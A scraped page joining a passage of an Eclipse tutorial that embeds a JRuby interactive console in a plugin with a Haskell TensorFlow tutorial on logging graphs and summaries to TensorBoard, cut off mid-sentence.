public PrintStream getOutput() {return out;}
public PrintStream getError() {return err;}
..
}
..
try {
Ruby rubyRuntime = Ruby.newInstance(conf);
String jRubyHome = System.getProperty("jruby.home");
String jRubyVersion = System.getProperty("jruby.version");
rubyRuntime.evalScriptlet("$:.insert(0,"+jRubyHome+"\\lib\\ruby\\"+jRubyVersion+"')");
rubyRuntime.evalScriptlet("$:.insert(0,'"+jRubyHome+"\\lib')");
rubyRuntime.evalScriptlet("require 'jruby';");
rubyRuntime.evalScriptlet("require 'eclipse_console_irb';");
} catch (Exception e) {
e.printStackTrace();
}
}
}
The Console can be added to
the GUI by a very simple piece of code. I chose to add it by creating an action
that creates a new Console, so I have a new menu
entitled Ruby Console
Ruby Console
..
static RubyConsole ruby = new RubyConsole();
..
ConsolePlugin.getDefault().
getConsoleManager().addConsoles(new IConsole[]{ ruby });
ConsolePlugin.getDefault().getConsoleManager().showConsoleView(ruby);
..
After I build the
plugin from my project, and deploy it, I get the rather
pleasing result of a Ruby console in my Eclipse workbench with
a eIrb>: prompt at the
console, and the interpreter’s results shown as I type in commands. It even has
nice colours. Shown here:
eIrb>:
What can you do with this
though? Well anything you like (within
reason) but provided your plugin has added upstream
plugins to its dependency list, you can load any Java
classes you like from that plugin and work with them.
For example, I have added the “org.eclipse.core.resources”
to my RubyConsole plugin’s
dependency list, and so I can access the Eclipse Workspace by typing:
eIrb:> include_class 'org.eclipse.core.resources.ResourcesPlugin'
=> ["org.eclipse.core.resources.ResourcesPlugin"]
eIrb:> workspace = ResourcesPlugin.get_workspace
=> #<Java::OrgEclipseCoreInternalResources::Workspace:0x25abb1 @java_object=org.eclipse.core.internal.resources.Workspace@12605d>
workspace
eIrb:> workspace.methods
eIrb:> projects = workspace.get_root.get_projects
eIrb:> projects.each { |p|
eIrb:> puts p.get_name
eIrb:> }
eIrb:> projects[0].build(0,nil)
eIrb:> projects[0].close(0,nil)
eIrb:> workspace.get_root.get_project('project1').open nil
.rb
require
eIrb:> require 'useful.rb'
The plugin with sourcecode. All version info, etc. in the readme.txt:
RubyConsoleJeremyMeyerBlog.zip
Puppets Do JRuby:
public int available() throws IOException {
if (closed && eofSent) {
throw new IOException("Input Stream Closed"); //$NON-NLS-1$
} else if (size == 0) {
if (!eofSent) {
eofSent = true;
return -1;
}
throw new IOException("Input Stream Closed"); //$NON-NLS-1$
}
return size;
}
|
http://www.artima.com/forums/flat.jsp?forum=106&thread=227935
|
CC-MAIN-2016-44
|
refinedweb
| 1,750
| 62.48
|
Agenda
See also: IRC log
<scribe> scribe: Dan
-> Passwords in the Clear May 1 2008
discussion of skw's comments on "The Digest method is subject to dictionary attacks, and must not be used except in circumstances where passwords are known to be of sufficient length and complexity to thwart such attacks."
SKW: I prefer to replace the imperative "must not" with factual phrasing
DO: hmm... ok
<noah> The sophistication and power of dictionary-based attacks continues to increase such that longer and complex passwords are increasingly vulnerable to attack.
NM suggests replacement for "The sophistication and power of dictionary-based attacks continues to increase such that longer and complex passwords are vulnerable to attacks, not just short passwords using common terms."
<noah> Short passwords or those using common words should not be used with digest authentication. Indeed, The sophistication and power of dictionary-based attacks continues to increase such that longer and more complex passwords are increasingly vulnerable to attack.
DO commits a 20 May revision...
DO: so on 2.1.1... are we done?
TBL: clarify "dictionary attack" as "offline dictionary attack"?
DO: the fact that it's subject to dictionary attack has to do with the presence of nonces in the protocol.
TBL: there are online dictionary attacks where each attempt involves communication with the server and offline attacks where attempts don't involve communication with the server
SKW: just add "offline"?
TBL: well... is that enough to explain it to our readership?
<timbl> add ,because a single session can be recrded and attacked offline,
<timbl> add ,because a single session can be recorded and attacked offline,
<timbl> in place of '
<timbl> in place of the comma after "disctionary attack"
<dorchard> The Digest method is subject to dictionary attacks because a single session can be recorded and attacked offline. It is particularly vulnerable in circumstances where passwords are known to be of insufficient length and complexity to thwart such attacks.
<timbl> dictionary dictionary dictionary dictionary dictionary
<timbl> +1
modulo "it", seems good to several
<dorchard> particularly vulnerable in circumstances where passwords are known to be of insufficient length and complexity to thwart such attacks.
<dorchard> particularly vulnerable in circumstances where passwords are known to be of insufficient length and complexity to thwart such attacks.
<dorchard> The Digest method is subject to dictionary attacks because a single session can be recorded and attacked offline. The Digest method is particularly vulnerable in circumstances where passwords are known to be of insufficient length and complexity to thwart such attacks.
poll shows that's ok
DO: let's look at section 1
various editorial comments
DO: on to section 2... boxed notes...
... hmm... "A server SHOULD NOT" vs "A client browser MUST NOT ..."
SKW: how does W3C's site work?
DC: basic auth. passwords in the clear. [we've tried many times to get rid of them, but we get stuck somewhere in deployment]
TBL: have we explained how to do without passwords in the clear?
DO: we talk about digest and SSL/TLS
NM: so the security context WG is saying "never do basic without ssl"... are we going that far?
DO: this finding is about "securely ..."
... as the security context WG has said, when sites like w3.org use passwords in the clear, not only is w3.org at risk, but users are trained to use passwords in the clear
TBL: how about a distinctive UI when a browser prompts for passwords that are going to be transmitted in the clear?
DO: I've seen user interfaces for password strength
NM: does it help that much if one site goes to SSL? if I've used that password elsewhere, I'm still in trouble.
SKW: naive users don't really understand these subtleties
NDW: our audience is not end-users but site developers and perhaps browser/client developers. we can make a strong statement, and perhaps they'll improve things. how they improve things is beyond our scope
DC: well...
TBL: let's target the finding and give clear advice
DO: see "Automatic Protection by User agent" which is clearly about what browsers/ajax apps...
TBL: how many sites use basic auth anyway? don't most of them use forms+cookies? are we OK with cookies?
DC: cookies are pretty much passwords to me. they're session keys
DO: no, let's leave cookies aside; this finding is about passwords
SKW: are cookies discussed in the current draft?
... "temporary storage in cookes" is in the intro
DC: regarding w3.org... if the TAG resolves that cleartext passwords MUST NOT be used, as team contact, I'll be obliged to try deploy this on w3.org; we've tried a number of times in the past and failed due to lack of software support for digest etc.
SKW: how about SSL?
DC: I don't recall how far we tried SSL; that would probably be the thing to try this time
AM: this finding advises users not to use sites that do passwords in the clear; how can users tell?
DO: there are UI clues in browsers
... given forms and javascript and such, browsers can't exhaustively determine
SKW: time draws near...
DO: the one critical issue I see is the inconsistency between SHOULD NOT and MUST NOT
... let's make them both MUST NOT
SKW: I'd prefer to just enumerate the risks and leave out the imperatives
<dorchard> There are no scenarios where it is secure to transmit passwords in the clear. Every scenario that involves possibly transmitting passwords in the clear can be redesigned for the desired functionality without a cleartext password transmission.
DO: feel obliged to represent the position of the Secrurity WG
TBL: how about "... without risk" and MUST NOT
PROPOSED: to approve the passwordsInTheClear finding, contingent on tbl's ok, and call for review by web security context wg, [http? wg], html WG, XHTML 2 WG
... OASIS WSX TC
... W3C security spec maintenance WG
<Ashok> OASIS WS-SX
so RESOLVED.
<scribe> ACTION: David finish refs etc on passwords in the clear finding [recorded in]
<trackbot-ng> Created ACTION-150 - Finish refs etc on passwords in the clear finding [on David Orchard - due 2008-05-27].
[break]
<timbl> PWITC is OK by me
<timbl> You can resolve the contingency on me
TBL: I'm interested in review by browser makers too
HT: perhaps via their AC reps?
DO: not RoR devs?
TBL: sure... this is a heads up, not a round-trip, is it?
DO: this is a round-trip to many of these groups
TBL: OK, let's just notify the browser makers
SKW: we're resolved congingent on HT, NDW, and myself; the contingency has resolved.
<scribe> ACTION: henry announce namespaceDocument-8 finding on tag-announce etc. [recorded in]
<trackbot-ng> Created ACTION-151 - Announce namespaceDocument-8 finding on tag-announce etc. [on Henry S. Thompson - due 2008-05-27].
JAR: has anyone implemented it?
HT: no, though any RDDL 1.0 document has the relevant info... did one of us produce a stylesheet for that?
(hmm... who's going to to update the RDDL namespace doc?)
HT: work on this was preempted by work on ARIA etc.
JAR: fwiw, Alan R. and I have been working on a document with overlapping scope
<scribe> ACTION: Jonathan review overlap between the HCLSI URI note and HT's w.r.t. contribution to TAG finding on UrnsAndRegistries [recorded in]
<trackbot-ng> Created ACTION-152 - Review overlap between the HCLSI URI note and HT's w.r.t. contribution to TAG finding on UrnsAndRegistries [on Jonathan Rees - due 2008-05-27].
SKW: there was an OASIS last call on XRIs... closes 30 May
AM: remind me what our earlier comments are?
HT: [summarizes]
www-tag/2008Feb/0009.html is projected
NM: what's the status of XRIs? how does that relate to OpenID?
HT: OpenID has a forward reference to a moving target XRI spec. [?]
TBL: that's a bug [re the use of conneg in HTTP as discussed in 2008Feb/0104 ]
-> XRI TC response to W3C TAG Comments on XRI Resolution 2.0
<dorchard> I see in OpenID the following: <Service xmlns="xri://$xrd*($v*2.0)">. I don't think this is legal is it?
<CGI691> from
[[[ Scribe: Is CGI691 Ashok? ]]]
<timbl> maybe
<timbl> Extensible Resource Identifier (XRI)
<timbl> Resolution Version 2.0
<timbl> Committee Draft 02
<timbl> 25 November 2007
<CGI691> I do see in OpenID Supports the use of XRIs as Identifiers. XRIs may be used as Identifiers for both end users and OPs, and provide automatic mapping from one or more reassignable i-names to a synonymous persistent Canonical ID that will never be reassigned
SKW: I've been asked what's the TAG's position on XRIs
<ht> DanC, see
TBL: why didn't we ship that finding?
<Stuart> see table 5 line 351.
HT: because we thought it only worked for people who already agreed with us
DO: but in retrospect, that was a mistake: even that would have helped http: advocates in OpenID work
... I'm inclined to come back to this after doing some drafting over a break
NM: hmm... take a position on XRI-in-OpenID while we're at it?
... perhaps there's a risk that OpenID will be the vehicle that brings XRI into widespread use
DO: quite. I'm concerned about that.
(re xris vs email, I found something nearby... )
SKW: we have some concerns, but what conclusions?
... testing the waters... poll: all the cases addressed by XRIs can be addressed using HTTP URIs?
many in support.
HT: well... there's a trade-off... if somebody gives up ubuquity, they can get more control
NM: there are certain clear drawbacks to a new scheme... list those... we haven't seen any motivation to overcome those disadvantages
... how about something like that?
<Service xmlns="xri://$xrd*($v*2.0)">
^ from openid2
<CGI691> I observe that XRI has now published a naming dispute resolution mechanism at
<timbl> ACTION notes deb
quite
[lunch]
<Norm> scribenick: norm
<scribe> scribe: Norm
Meeting resumes
ht: or wrw war aggw a rrgggww
General laughter at a joke that won't work in the minutes
<scribe> Chair: timbl
SW expresses some concerns about the tone of the message.
Proposed: We send the text drafted at this meeting to the internal tag list, with an action for Henry to fill in the blanks. To be mailed publicily by Tim and Stuart, co-chairs of the TAG.
<DanC_lap> no, not the internal tag list; www-tag
<DanC_lap> oh. I see.
Resolved.
<scribe> Chair: Stuart
<DanC_lap> action-116?
<trackbot-ng> ACTION-116 -- Tim Berners-Lee to align the tabulator internal vocabulary with the vocabulary in the rules, getting changes to either as needed. -- due 2008-03-06 -- OPEN
<trackbot-ng>
JR: We've been meeting by phone. Some sort of ontology for HTTP seems to be in the works.
... Some goals: use in the tabulator, use in next webarch, integration with bigger ontologies for interoperability,
... provenance (citations on the web), alignment of goals across several of these projects,
... more baking for the resource/information resource distinction,
... There's a question of how to manage the mailing list members.
HT: I think we should give JR control of the list.
General agreement.
JR: Some statements we'd like to be able to answer:
<timbl>
JR: questions about pure mechanics, "the string that was in the response..."
... What can you say about RFC 2616 about the entity?
... What do the status codes mean (specifically, 200 and 3xx)
... What does a 200 response say about the resource?
... What are the sources of descriptive information (link header, link element from HTML, 303 content location...)
... Question of coherence between representations.
... (Do English and French versions "say" the same thing?)
... Assessing the correctness of a mirror.
... I've got some links that I'll provide.
NM: I think there's been some scope creep. I thought it was going to be very narrowly focused, but there seems to be some much broader goals in some minds.
<DanC_lap> (fwiw, re caching, I presented at a WWW9 workshop in 2000, based on the 1994 caching paper by Luotonen and Altis. )
JR: I think it would be nice to deliver something, and the mechanics are interesting for some applications, but on the other hand, if I don't have a little more guidance of when 200 responses are acceptable, I won't have gotten much out of it.
TimBL: What scope creep?
NM: I actually said ambiguity. I thought it was going to be about mechanics, but there are bigger issues and they're all connected.
<DanC_lap> (more work, nov 2003 )
HT: RFC 2616 puts you very close to httpRange-14.
JR: Semantic web kicks you even further. I think "what is an information resource" is a red herring, the question is, when can I give a 200 response.
<DanC_lap> (and I saw FRBR came up in awwsw email... "I suggest adopting w:InformationResource rdfs:subClassOf frbr:Work as a practical constraint." -- my IRW 2006 paper )
JR outlines the contributions from different individuals:
scribe: David Booth's RDF capturing httpRange-14
... A use case presenting ambiguity between XML document IDs and an RDF person.
... Jonathan's category diagram
<DanC_lap> example: foo#xyz where foo has an XML representation with id="xyz", hence foo#xyz identifies part of an XML document; meanwhile, foo#xyz is claimed to identify a person.
scribe: Question of how FRBR ontologies line up with the other discussions in the group.
... (exploring the neighborhoods of 200's)
<DanC_lap> timbl, a frbr citation:
JR: The information resource question comes to me because I want to know if someone gets a 200 for a journal article, can I use that for provenance, or do I have to setup a separate URI which 303's.
<DanC_lap> crud; doesn't cite the main FRBR work
<DanC_lap> aha...
<DanC_lap> [IFLA]
<DanC_lap> K.G. Saur IFLA Study Group on the Functional Requirements for Bibliographic Records. Functional Requirements for Bibliographic Records: Final Report. UBCIM Publications-New Series. Vol. 19, Munchen: , 1998.
JR: The question of "time" comes up periodically, but we're trying to keep that out of scope.
<DanC_lap>
Some discussions and general agreement that it's sometimes necessary to model time but is very hard.
DanC: Is there light at the end of the tunnel?
JR: No.
NM: I think the elephant in the room is "what is an information resource"?
DanC: Is there a critical need?
JR: I want to know if I can return a 200 for a journal article.
DanC: "Yes"
JR: I'd like to be able to answer questions like that without questioning you and TimBL.
NM: We may all be happy with that answer, but there are others who aren't.
Some discussion of "what is an information resource"
<DanC_lap> HT raises a point of order whether that's what we're discussing; SKW suggests no, come to the AWWSW meetings to do that, which meeting participatns are satisfied with
JR: Maybe in six months we'll have a draft.
<DanC_lap> tbl, please put some stuff in a la "presented at a TAG meeting May 2008"
HT: I am often a fan of putting rat hole inducing topics to one side in the hopes it'll go away. I fear that the information resource question is not such a topic.
... The AWWSW group has to give some sort of concrete answer to the question of what does a 200 mean.
... If not in the actual ontology then good, english language prose to that effect.
<DanC_lap> (and I saw FRBR came up in awwsw email... "I suggest adopting w:InformationResource rdfs:subClassOf frbr:Work as a practical constraint." -- my IRW 2006 paper )
More discussion ensues.
<ht> 'my' as in DanC ?
<DanC_lap> yes
<ht> 'I' also DanC?
<ht> (in "I suggest")
<DanC_lap> DanC: I suggest finding several examples to bound InformationResource above and below; e.g. frbr:Work
<DanC_lap> (yes)
TimBL: Another practical question: what can you deduce from relationships like when you get a 302 or conneg.
... Should you perceive that all these things are the same resource?
<ht> Note that I'm happy with what I believe to be the current state of the AWWSW emerging consensus that there is no class in the ontology named Resource
TimBL: So I added a new relationship, "same-work-as" so in the FRBR area I think we'll find wide resources that are the same work.
... That came up recently in running code.
<timbl_> Noah,
Moving on to "redirections57"...
->
There's a document coming out in June; they'd like to say something about the link: header.
JR: If the TAG can't find an answer in time, or doesn't like it, what then?
... in that case, they'll move it to the non-normative section.
TimBL: Can we do a straw poll.
Pretty much a three-way split: in-favor, not-in-favor, undecided.
HT: I've stated my concern before: I don't want unsolicited metadata.
TimBL: What are the other concerns?
<scribe> Chair: TimBL
DanC: My concern is the relationships; are they managed in URIs or shortnames or...
JR: That's all resolved in the latest drafts.
NM: I have vague concerns, but they're not crisp enough to drive the group in any direction.
<DanC_lap> (right; so falling back to HTTP 1.0 doesn't address my concern about relationship names)
Stuart: Is Henry's concern one of taste or style or is it actively harmful?
HT: Consumption of bandwidth is the leading term. The second part is that I'm concerned its the thin end of a very long wedge.
... Header information needs to be very carefully considered. How many times ahve we had filesystems that say
... there's a data fork and a resource fork. We're going to distinguish between the message and what its about.
... It's never worked well.
... It makes me very happy to keep the seperable stuff as small as possible. We already have the problem that files don't tell you their media types.
... Now we're adding more important metadata that we won't get from file: URIs.
<Zakim> DanC_lap, you wanted to suggest bounding the class InformationResource above and below
Stuart: Is this a way of encoding metadata in the Link: header or a way of pointing to metadata
HT: The concern is that its the thin end of a long wedge.
Stuart: I don't want to encourage putting a hole RDF graph in the link headers.
<noah> I'm curious whether Henry is ultimately concerned about message size, or something deeper
TimBL: I like link: header *for* the bandwidth issue. Instead of having things creep into other headers, all sorts of metata can go in a server-generated virtual document.
... For people who really care about the metadata, they can follow the link. For others, it won't be clogging the bandwidth.
... I agree that the resource fork file architecture is sub-optimal. If it really were a resource fork then I'd see that as a bad thing.
... But the problem with the resource fork is you wind up with two open commands, one to open the data and oen to do both.
... The resource fork isn't a first-class file. The link: header is just a pointer to a file.
<DanC_lap> (I wonder what contemporary web mirroring tools do with mime types... if I have foo.html with content-type: image/gif and I copy it with wget, does it lose the image/gif media type? I bet it does)
TimBL: The resource fork is more like GETMETA.
HT: I think there are three classes, link:, GETMETA, or systematically manipulating the URI.
... Only the third has any possible way of being extended to file: URIs.
... But it's a lot easier to start a server running these days.
... I have some sympathy with the systematic URI manipulation.
... If the question was called, I wouldn't object.
AM: There are lots of different styles of metadata.
... Are you not happy because its one link for different kinds of metadata?
HT: Yes, I think that's what Tim's point just now was.
... This is as far as you get, no farther. Everything else has to leverage this.
... I don't know if this is good or not.
JR: You could go even further and just have a single "Resource-Description:" header.
HT: I didn't realize that there were going to be lots of link: headers.
... I want to say "no" to that on the same grounds.
DanC: If people fall back to HTTP 1.1 then they won't get those bits.
JR: It's a separate RFC so it could be applied to different versions.
Some discussion of the Atom/Link header registry
Further discussion of a small technical error about the use of .../link-relationships.html# as the base URI for Link: headers
->
<timbl_> ACTION: dan to report Relationship values are URIs that identify the type of link. If the relationship is a relative URI, its base URI MUST be considered to be "", and the value MUST be present in the link relation registry. is a bug to the relevant bug sink fro [recorded in]
<trackbot-ng> Created ACTION-153 - Report Relationship values are URIs that identify the type of link. If the relationship is a relative URI, its base URI MUST be considered to be \"\", and the value MUST be present in the link relation registry. is a bug to the relevant bug sink fro [on Dan Connolly - due 2008-05-27].
JR: The question isn't settled. I find Henry convincing, but then I think about the scenarios and what's to be said to Phil and I'm not so sure.
... The situation that brought this to my mind was a lot of documents that have metadata (lab reports, etc.) and where do you put it?
... That question is going to remain for me and the link: header is a convenient answer for a lot of administrators.
<Zakim> Stuart, you wanted to say that there can be more than one link; and to say that link is already regarded as being there.
Stuart: There can be multiple link: headers and they can be distinguished so that you can tell what link will give you WSDL and what one will give you POWDER, etc.
... Roy would say that the link: header has always been there, what Mark has done is ground the relationships in URI space.
Timbl: They can also be pushed into a single link header with commas.
... This seems like the sort of thing that the TAG should really put its weight behind.
... There are a whole lot of things taht would be made easier and it's a lever that would allow lots of innovation.
... What can we do to promote it??
JR: I'm reluctant without convincing the naysayers.
TimBL: No, what would we do if we wanted to.
JR: I think just a simple statement of support would be enough.
NM: Maybe the question is, are there strong naysayers on the outside.
JR: Yes there are
NM: So we need to either convince them or convince the people who will convince them.
JR: Do you want to go through the issues list?
Stuart: We're into break time.
<timbl_> Proposal2: The TAG recommends the use and standardization of the HTTP Link: header as described in
<DanC_lap> issues in
DanC: I think we should take 30 seconds and see if anyone has any of these issues they think is critical.
The group pauses to read the issues at the end of the uniform-access document.
<DanC_lap> #3 #
<DanC_lap> # Mechanisms that require special server configuration may not be accessible to all author/publishers; there will be an interaction with the way content is hosted and so on.
HT: I think 3 (mechanisms that require server configuration) is hugely important; I just want to emphasis that.
TimBL: I think we need to address that as a separate TAG issue. It's important, but we should try to get ISPs to provide more control.
DanC: You think this is a critical stopper for link:?
HT: I don't know. Many of the alternatives have this problem.
<Zakim> DanC_lap, you wanted to ask for a refined poll... not just "who likes link?" but "who finds Link to be a cost-effective solution to the powder use case? grddl? mobile bp?
DanC: If you fix the bug with the hash, then the URI relationships become information resources.
TimBL: So we should note that IANA will have to run a 303.
... But that will be useful for a lot of reasons.
TimBL highlights proposal2 above.
JR: it has to be strongly qualified
DanC: Doesn't the draft enumerate the qualifications?
... I'd like to see it used for bibliographic metadata for immutable files, POWDER, etc.
... We shouldn't recommend technology for technologies sake, we should name the use cases that it addresses.
HT: Is anyone actively championing alternatives?
<DanC_lap> I'm happy with Link for powder, grddl, and metadata for immutable files
JR: MGET has been implemented
TimBL: ... scribe missed the other example ...
DanC: There's PROPFIND, but that's not being recommended here.
Some discussion of the benefits of manipulating the URI, a la adding ",about" or /about/
<timbl_> Proposal3: The TAG recommends the use, for POWDER and metadata about fixed resources, and GRDDL transformation links; and standardization of the HTTP Link: header as described in
<timbl_> Proposal4: The TAG recommends the use, for example for POWDER and metadata about fixed resources, and GRDDL transformation links; and standardization of the HTTP Link: header as described in].
TimBL: Should we run the link: header on w3.org?
<timbl_> should th w3 now run this on w3.org? ,meta and link header for the w3.org site
<timbl_> for: ACL info, conneg variants, ...
Dan and TimBL to discuss that offline.
NM: Previously, I had prepared a draft for Vancouver. I got a mix of reactions.
... I republished a draft that included a number of substantive comments from the last review.
... I believe that's all I've changed in this draft.
... Some highlights:
... I've promoted the RDFa material up to its own chapter
... I put in the picture that TimBL prepared of the web's standard retreival mechanism in an appendix, after prose introduction in the text
<timbl_> The image needs a width=100% OWTTE
NM: Added principles to motivate good practices.
... I killed a few GPNs.
<DanC_lap> (hmm... the TOC lists microformats as an example of "RDF and the Self-Describing Web"; the community seems to be divided on that... ah... the text doesn't assume consensus)
<timbl_> Noah, do you have a pointer to the original PNG?
NM: The RDFa task force has sent an informal response that we should deal with.
... That's my brain dump on what's changed. I think it's ready to ship except for some RDFa details and some editorial work on the diagram.
Stuart: Can we get explicit actions to review the draft?
<DanC_lap> (I read a previous draft pretty carefully; I'm sorta used up as a reviewer)
<scribe> ACTION: Norman to review The Self-Describing Web, either the 12 May draft or the draft that comes out of this meeting [recorded in]
<trackbot-ng> Created ACTION-155 - Review The Self-Describing Web, either the 12 May draft or the draft that comes out of this meeting [on Norman Walsh - due 2008-05-27].
<scribe> ACTION: Stuart to review The Self-Describing Web, either the 12 May draft or the draft that comes out of this meeting [recorded in]
<trackbot-ng> Created ACTION-156 - Review The Self-Describing Web, either the 12 May draft or the draft that comes out of this meeting [on Stuart Williams - due 2008-05-27].
The group reads section 5.1 Using RDFa to produce self-describing HTML
NM: One of the RDFa TF comments is that RDFa only applies to XHTML. So I plan to fix that by changing all the references here to HTML.
<noah>
DanC: I think the sentence that begins "Even though..." is wrong
NM: I meant that historically, if you were developing an RDF app, you didn't need to read HTML and now you do.
TimBL: This is an example of a design question. The fragment of HTML isn't self-describing until one of two things happens:
... 1. Revise the media type so that it references RDF
... 2. Assume that GRDDL is part of the core and add a GRDDL transformation
NM: Ok, what I'm hearing is that this sentence should be deleted or restated to address Dan's concern.
... What I'd like to do is go through these two points a little bit methodically to make sure that I understand their concern and the relevant background.
... Come out of today with a story of what they could have done, what they did, and then go back and revisit the first sentence.
... So, "The last paragraph reads in part "For this example document to be self-describing, the pertinent media type and the specifications on which it depends must provide for the use of RDFa in XHTML; at the time of this writing, they do not.""
"The XHTML 2 Working Group disagrees with this statement"
Some discussion of with what they are disagreeing.
General agreement: You can't have action at a distance. The assertion that you're a member of the family isn't enough, the *actual mime type* has to point explicitly to the members of its family.
NM: There are three markers you can use to say that this is not any old HTML.
DanC: Ok, so tell the follow-your-nose story with one of these.
NM: One of the ways you can go forward is with a DTD
TimBL: Take out the DTD.
DanC: You can't, because that's part of the spec.
TimBL: The DTD is required?
NM: It's a SHOULD
->
->
Some discussion of whether or not they have an example without a document type declaration.
DanC: If you're going to tell the follow-your-nose story with DTDs, good luck getting it past me and Tim, but otherwise you should remove it.
JR: Why do you so badly need to know there's RDFa in it?
DanC: You need the follow your nose story so that you can license the assertions in the document.
NM: Let me see if I can summarize: the relevant base spec does refer to the profile attribute, therefore we can tell the follow-your-nose story with that.
... DTDs do various things, but they aren't part of that story.
... The @version attribute recommended in the new editor's draft isn't part of the follow your nose story either.
... There are two possible paths: they could revise their spec, but let's assume they won't.
... Section 4.1 of the latest RDFa draft specifies that there are three mechanisms to indicate that a document is RDFa enhanced.
... Of these, only one, the profile attribute, is useful to make the document self describing.
<timbl_> I note that <title>My home-page</title>
<timbl_> <meta property="dc:creator" content="Mark Birbeck" />
<timbl_> <link rel="foaf:workplaceHomepage" href="" />
<timbl_> is a FOAF error. The foaf:workplaceHomepage property I think links a person and a home page not a home page and a home page. no?
<timbl_> ------
NM: because the @profile is specifically referenced as an extension mechanism in the core specs.
... the others aren't self describing.
<timbl_> (above bug was in)
DanC: I don't think that's a helpful way to tell the story.
Stuart: There's more than one follow-your-nose story. Perhaps we're getting confused.
NM: I thought TimBL offered a third choice that they don't mention, GRDDL.
Stuart draws a diagram
application/xhtml+xml -> RFFC 3236 -> HTML M12N -> -> RDFa specification
HT: That namespace document doesn't actually refer to the RDFa specification yet, but it does say it might.
Some discussion about whether or not the MIME type specification actually gives you enough information to follow your nose.
It's not as crisp as one might like, but arguably works.
RFC 3236. However, it should suffice for now for the purposes of
interoperability that user agents accepting
'application/xhtml+xml' content use the user agent conformance
rules in [XHTML1].
"
From which we get from the MIME type to the namespace document.
By way of M12N.
NM: I'll revisit the sentence "Even though this..." in 5.1 of Self Describing Web and redraft.
... And pull the DOCTYPE
Stuart: So you're going to redraft?
NM: As I said, I think it's pretty good except for the RDFa stuff and now I can fix that.
Some discussion of how to respond to the RDFa email message.
<Zakim> timbl_, you wanted to sggest remove doctype and to ask what the follow your nose algo *is* here in RDFa, the section seems to duck the issue
<Zakim> DanC_lap, you wanted to note HTML 5 editor doesn't consider GRDDL nor RDF relevant to design of HTML 5
DanC: The HTML 5 editor doesn't consider GRDDL nor RDF relevant to the design of HTML 5. HTML5 has no @profile.
<DanC_lap>
<DanC_lap> Ian Hickson's rationale for not including profile, in full, seem to only be in the whatwg archive
DanC: I disagree with him on an architectural basis, but I can't argue with the fact that lots of authors won't use @profile.
TimBL: Leaving these things out prevents smaller communities from innovating.
... The RDF community would like a profile so that they can use HTML in the ways that they want, even though they are a minority community.
DanC: "But RDF is not relevant to real life"
TimBL: That's just not socially inappropriate.
Some discussion of how best this argument could be phrased.
Stuart: There were topics we wanted to come back to, how should we adjust our agenda for tomorrow?
<DanC_lap> I heard tim give a little bit of something new: "to ignore the overlap between the RDF and HTML communities is unacceptable"
NM: I believe that XHTML says it may sometimes be necessary to deliver it with text/html. Furthermore, lots of it is delivered that way.
... I tried to cover follow-your-nose from text/html.
DanC: You can't.
NM: So I could just leave it out, or I could say why text/html doesn't work.
DanC: I kind of like the profile story
TimBL: But there are lots of reasons why the RDFa folks don't want to do that.
... They story I think we should tell is that text/html is a poor person's XML and the implicit namespace for text/html documents is the XHTML namespace.
... The other way is to make the RDFa spec is part of the core
Scribe note: this is a third option from Tim's earlier list
<DanC_lap> (a point I noted earlier: Ian Hickson: For example, in most of about a billion pages I hit in 2005 I found that the html 4 profile attribute was used in about 1.4 million pages... which sounds like a lot, until you realize that the dc.title in the <meta> element, which you should always use with the profile attribute was used about 19 million times. So 1.4 million times we use profile ever, and 19 million times we use dc.title, just one of any number of v
<DanC_lap> alues that requires the profile attribute. So that's 10 times more times we use the extension mechanism than we use the extension declaration it wants. -- )
Some more discussion of the text/html media type.
DanC: The text of the text/html media type spec probably hasn't caught up with current understanding.
NW: I think you could just leave it out.
NM: But there's a lot of XHTML that's served as text/html
NW: I still think you could just leave it out.
Some discussion of the editorial mods needed to the graphic.
<DanC_lap> (what was that address, timbl?)
<timbl_> ( , danc)
Stuart: What was the outcome of the @profile discussion?
DanC: You're all notified and I might follow up with TimBl. I accepted that there was no action following.
Stuart: There were a few things to potentially revisit:
... XML Versioning
... Distributed extensibility
... URNs and Registries
<DanC_lap> agenda order is 15, 16, 13, 14
<DanC_lap> agenda order is 12
<DanC_lap> agenda order is 12, 15, 16, 13
Adjourned for the day
<DanC_lap> scribe editing: HT for day 1, Norm for day 2, Noah for day 3
|
http://www.w3.org/2001/tag/2008/05/20-minutes
|
CC-MAIN-2015-35
|
refinedweb
| 6,131
| 72.87
|
Last week we built our first neural network and used it on a real machine learning problem. We took the Iris data set and built a classifier that took in various flower measurements. It determined, with decent accuracy, the type of flower the measurements referred to.
But we’ve still only seen half the story of Tensor Flow! We’ve constructed many tensors and combined them in interesting ways. We can imagine what is going on with the “flow”, but we haven’t seen a visual representation of that yet.
We’re in luck though, thanks to the Tensor Board application. With it, we can visualize the computation graph we've created. We can also track certain values throughout our program run. In this article, we’ll take our Iris example and show how we can add Tensor Board features to it. Here's the Github repo with all the code so you can follow along!
Add an Event Writer
The first thing to understand about Tensor Board is that it gets its data from a source directory. While we’re running our system, we have to direct it to write events to that directory. This will allow Tensor Board to know what happened in our training run.
eventsDir :: FilePath eventsDir = "/tmp/tensorflow/iris/logs/" runIris :: FilePath -> FilePath -> IO () runIris trainingFile testingFile = withEventWriter eventsDir $ \eventWriter -> runSession $ do ...
By itself, this doesn’t write anything down into that directory though! To understand the consequences of this, let’s boot up tensor board.
Running Tensor Board
Running our executable again doesn't bring up tensor board. It merely logs the information that Tensor Board uses. To actually see that information, we’ll run the
tensorboard command.
>> tensorboard --logdir=’/tmp/tensorflow/iris/logs’ Starting TensorBoard 47 at
Then we can point our web browser at the correct port. Since we haven't written anything to the file yet, there won’t be much for us to see other than some pretty graphics. So let’s start by logging our graph. This is actually quite easy! Remember our model? We can use the
logGraph function combined with our event writer so we can see it.
model <- build createModel logGraph eventWriter createModel
Now when we refresh Tensor Flow, we’ll see our system’s graph.
What the heck is going on here?
But, it’s very large and very confusing. The names of all the nodes are a little confusing, and it’s not clear what data is going where. Plus, we have no idea what’s going on with our error rate or anything like that. Let’s make a couple adjustments to fix this.
Adding Summaries
So the first step is to actually specify some measurements that we’ll have Tensor Board plot for us. One node we can use is a “scalar summary”. This provides us with a summary of a particular value over the course of our training run. Let’s do this with our
errorRate node. We can use the simple
scalarSummary function.
errorRate_ <- render $ 1 - (reduceMean (cast correctPredictions)) scalarSummary "Error" errorRate_
The second type of summary is a
histogram summary. We use this on a particular tensor to see the distribution of its values over the course of the run. Let’s do this with our second set of weights. We need to use
readValue to go from a
Variable to a
Tensor.
(finalWeights, finalBiases, finalResults) <- buildNNLayer numHiddenUnits irisLabels rectifiedHiddenResults histogramSummary "Weights" (readValue finalWeights)
So let’s run tensor flow again. We would expect to see these new values show up under the
Scalars and
